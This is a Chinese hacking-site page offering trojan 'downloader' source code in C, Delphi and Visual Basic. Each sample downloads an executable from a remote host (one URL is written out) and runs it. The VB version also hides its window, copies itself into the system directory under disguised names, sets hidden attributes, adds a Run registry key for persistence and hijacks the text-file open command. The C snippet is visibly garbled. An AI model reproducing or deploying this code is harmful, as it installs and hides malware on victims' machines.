首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

三种语言的下载者源代码:C Delphi Vb


http://www.gipsky.com/
原始出处:http://www.antcodes.cn/post/17.html



C

#includehttp://www.lzitw.com/kj/hoho.exe","C:\test.exe",0,NULL);

ShellExecute(0,"open","c:\test.exe",NULL,NULL,SW_SHOW);

return 0;

}



Delphi

//调用API

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, forms,

Dialogs, StdCtrls, ExtDlgs, ShellAPI;

//调用的API函数

ShellExecute

URLDownloadTofile

//在Delpihi在窗体运行的那个过程(form1.CREAT)里写上

URLDownloadToFile (0, '木马地址', 'c:\蓝梦泽.exe', 0, 0

ShellExecute (0, 'Open', 'c:\fhm.exe', nil, nil, SW_SHOWNORMAL);



Visual Basic

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)'延迟1秒

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By value.

Const Key_Run = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Const HKEY_LOCAL_MACHINE = &H80000002

Const REG_SZ = 1 ' Unicode nul terminated string

Dim LhKey As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private Sys As String '系统目录

Private US As String '自己

Private Tmp As String '临时文件夹

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Sub form_Load()

On Error Resume Next

Dim RegEdit As Object, Apppath As String

Dim Cp As String

Dim Ret As Long

Dim sCurrentPath As String, sSystemDir As String

sCurrentPath = App.Path & "\" & App.EXEName & ".exe"

form1.Visible = False

Sys = String(255, 0)

Ret = GetSystemDirectory(Sys, 255)

Sys = Left(Sys, Ret) '获得系统目录

US = String(1024, 0) '获得自己的完整路径

Ret = GetModuleFileName(0, US, 1024)

US = Left(US, InStr(US, Chr(0)) - 1)

Tmp = Temp '获得完整临时目录

If Dir(Sys & "\" & "hoho.exe") = "" Then

Ret = URLDownloadToFile(0, "http://www.lzitw.com/kj/hoho.exe", Sys & "\hoho.exe", 0, 0)

End If

Cp = Sys & "\system.exe"

Ret = RegCreateKey(HKEY_LOCAL_MACHINE, Key_Run, LhKey) '写入注册表,以便开机重启

Ret = RegSetvalueEx(LhKey, "server", 0&, REG_SZ, ByVal Cp, Len(Cp) 1)

Ret = RegCloseKey(LhKey)

If InStr(UCase(US), "INETDBS") = 0 Then

End If

Apppath = IIf(Right(App.Path, 1) = "\", Left(App.Path, Len(App.Path) - 1), App.Path)

'取得当前路径,假如是在根目录下就要去掉一个“\"

Set RegEdit = CreateObject("WScript.Shell")

RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", Sys & "\" & "rund1132" & ".exe %1"

On Error Resume Next

Dim cmd As String

cmd = Command()

If cmd <> "" Then

Shell "NOTEPAD.EXE " & cmd, vbNormalFocus

End If

On Error Resume Next

FileCopy sCurrentPath, Sys & "\System.exe"

On Error Resume Next

FileCopy sCurrentPath, Sys & "\" & "\rund1132.exe"

SetAttr Sys & "\" & "\rund1132.exe", 7

'判定程序是否下在运行

If App.PrevInstance Then

End

End If

Kill Sys & "\systrsy.exe"

Do While Dir(Sys & "\" & "systrsy.exe") = ""

Ret = URLDownloadToFile(0, "url", Sys & "\systrsy.exe", 0, 0)

Call Sleep(100000)

Loop

Shell Sys & "\" & "systrsy" & ".exe", vbNormalFocus
<< 即插即用和Flash可被用来攻击路由器 《士兵突击》经典对白 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8